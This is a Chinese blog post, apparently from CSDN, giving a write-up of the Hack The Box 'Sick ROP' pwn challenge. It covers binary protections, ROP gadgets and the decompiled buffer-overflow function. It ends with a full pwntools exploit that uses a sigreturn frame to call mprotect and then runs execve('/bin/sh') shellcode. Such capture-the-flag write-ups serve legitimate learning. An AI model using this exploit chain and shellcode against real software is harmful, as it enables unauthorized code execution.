HTB-Sick-ROP

最新推荐文章于 2024-07-20 22:27:15 发布
最新推荐文章于 2024-07-20 22:27:15 发布
阅读量378 收藏 7
点赞数 13
文章标签: 安全 python c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73373164/article/details/136590973
版权

title: HTB-Sick_ROP
date: 2023-12-13 19:04:07
categories: HTB
tags: PWN

Sick ROP

常规套路检查

    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

使用strings

rop.asm
read
write
vuln
__bss_start
_edata
_end
.symtab
.strtab
.shstrtab
.text

发现貌似没有什么可利用的点

本地运行调试发现我输出什么他就会照样输出

是静态的话我们使用ROPgadget --binary sick_rop --ropchain

0x0000000000401012 : and al, 0x10 ; syscall
0x000000000040100d : and al, 8 ; mov rdx, qword ptr [rsp + 0x10] ; syscall
0x0000000000401044 : call qword ptr [rax + 0x41]
0x000000000040104c : dec ecx ; ret
0x000000000040100c : je 0x401032 ; or byte ptr [rax - 0x75], cl ; push rsp ; and al, 0x10 ; syscall
0x0000000000401023 : je 0x401049 ; or byte ptr [rax - 0x75], cl ; push rsp ; and al, 0x10 ; syscall
0x0000000000401054 : jmp 0x40104f
0x000000000040104d : leave ; ret
0x0000000000401010 : mov edx, dword ptr [rsp + 0x10] ; syscall
0x000000000040100b : mov esi, dword ptr [rsp + 8] ; mov rdx, qword ptr [rsp + 0x10] ; syscall
0x000000000040100f : mov rdx, qword ptr [rsp + 0x10] ; syscall
0x000000000040100e : or byte ptr [rax - 0x75], cl ; push rsp ; and al, 0x10 ; syscall
0x0000000000401011 : push rsp ; and al, 0x10 ; syscall
0x0000000000401016 : ret
0x0000000000401049 : retf 0xffff
0x0000000000401014 : syscall

然后拖入ida发现就4个功能,第一次碰到

void __fastcall __noreturn start(int a1, int a2, int a3, int a4, int a5, int a6)
{
  while ( 1 )
    vuln(a1, a2, a3, a4, a5, a6);
}

启动写了一个死循环一直调用vuln

而vuln模块的话

__int64 __fastcall vuln(int a1, int a2, int a3, int a4, int a5, int a6)
{
  size_t v6; // rax
  int v7; // edx
  int v8; // ecx
  int v9; // er8
  int v10; // er9
  const char *v11; // r10
  char v13[32]; // [rsp+0h] [rbp-20h] BYREF

  v6 = read(a1, a2, a3, a4, a5, a6, v13, 0x300uLL);
  return write(a1, a2, v7, v8, v9, v10, v11, v6);
}

调用了read和write函数,

这个时候构造成srop

exp
from pwn import *

elf = ELF('./sick_rop')
if args.R:
 p = remote("*.*.*.*",30479)
else:
 p = elf.process()
context.clear(arch='amd64')
context.log_level = 'debug'

syscall_ret = 0x401014
read = 0x401000
writable = 0x400000
new_ret = 0x400018
vuln = elf.sym.vuln

payload = b'A'*40    # to our offset
payload += p64(vuln)
payload += p64(syscall_ret)

frame = SigreturnFrame(kernel="amd64")
frame.rax = 0xa     # syscall for mprotect()
frame.rdi = writable
frame.rsi = 0x4000
frame.rdx = 0x7    # rwx (read ,write , execute)
frame.rsp = 0x4010d8 # this will be our new stack kind of ie addr 0x400...
frame.rip = syscall_ret

payload += bytes(frame) # fake sigreturnframe

# sending
p.sendline(payload)
p.recv()

payload = b'B'* (0xf - 1 ) # sigret 15 syscall
p.sendline(payload)
p.recv()

# shellcode
shell_code = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"
payload = shell_code.ljust(40, b'A')
payload += p64(0x4010b8)
log.info('[*] Sending second stage payload with {} bytes ...'.format(len(payload)))
p.sendline(payload)

p.interactive()
c0iq
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
htb-beep
m0_55772907的博客
09-15 911
一般
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
HTB-Bastion
2201_75378806的博客
05-15 914
它存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。它是 Libguestfs 项目的一部分,该项目提供用于访问和修改虚拟机 (VM) 磁盘映像的工具。SAM 文件是 Windows 安全基础结构的关键组件,用于系统上的本地身份验证。检查器是一个可以自动检测映像中有关操作系统和磁盘结构的信息的工具。然而,在备份中它们是可以访问的,因为它们没有“使用中”。:指定要访问的虚拟机磁盘映像的路径。在这种情况下,路径指向位于指定目录的VHD(虚拟硬盘)文件。:指定磁盘映像应以只读模式安装。
HTB-Cronos
TA不懒,但还没有添加简介
12-06 495
HTB-Cronos
HTB-Jarvis
TA不懒,但还没有添加简介
04-16 320
HTB-Jarvis
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 555
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 585
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 810
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 820
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 839
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
数据库安全审计系统:筑牢数据安全防线 提高数据资产安全
2401_82472120的博客
07-17 449
其可以监控和审计用户对数据库中的数据库表、视图、序列、包、存储过程、函数、库、索引、同义词、快照、触发器等的访问、创建、修改和删除等,分析的内容可以精确到SQL操作语句级别。另外,它还可以根据设置的规则,智能判断出违规操作数据库的行为,并对违规行为进行记录、报警。通过对用户访问数据库行为的记录、分析和汇报,来帮助用户事后生成合规报告、事故追根溯源,同时通过大数据搜索技术提供高效查询审计报告,定位事件原因,以便日后查询、分析、过滤,实现加强内外部数据库网络行为的监控与审计,提高数据资产安全
防火墙--内容安全
最新发布
banliyaoguai的博客
07-20 365
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
响应“一机两用”政策号召 提高政务内外网安全
Canon_YK的博客
07-17 909
随着一机两用政策的实施,即政府部门内部网络终端在特定情况下需同时连接政务内外网,如何在保证工作效率的同时,确保网络安全和数据安全,成为摆在面前的重要课题。未来,随着技术的不断发展和完善,沙箱技术将在政务内外网安全中发挥更加重要的作用。深信达的SDC沙箱技术已经和多个政企单位合作,高效便捷的沙箱技术已经大大提升了政务机关的内网安全,为政务机关业务的开展提供了强有力的安全保障。SDC沙箱技术能够对隔离环境中的网络行为进行实时监控和审计,包括网络连接的建立、数据的传输、应用程序的运行等。
保障低压设备安全!中国星坤连接器精密工艺解析!
weixin_50506145的博客
07-16 540
随着技术的发展,对连接器的需求也在不断提升,特别是在低电压应用领域。中国星坤最新推出的低压连接器,以其精密性和安全性,为低电压设备提供了一个可靠的连接解决方案。中国星坤的低压连接器,以其卓越的性能和广泛的应用前景,为低电压设备的安全稳定运行提供了有力保障。随着技术的不断进步和市场需求的增长,低压连接器将在更多领域展现其独特的价值,成为连接现代电子世界的可靠伙伴。:在医疗领域,低压连接器用于连接各种便携式医疗监测设备,确保数据传输的准确性和设备的稳定性。:由于设计简洁,连接器的维护和更换变得简单快捷。
CVE-2023-4016
08-17
很抱歉,我没有找到与您提到的CVE-2023-4016相关的引用资料。是否有其他问题我可以帮助您解答?<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [HTB HARD 靶机 Cerberus WriteUp](https://blog.csdn.net/qq_58869808/article/details/129786875)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [weblogic漏洞总结 复现(未完)](https://blog.csdn.net/weixin_30558305/article/details/97564170)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值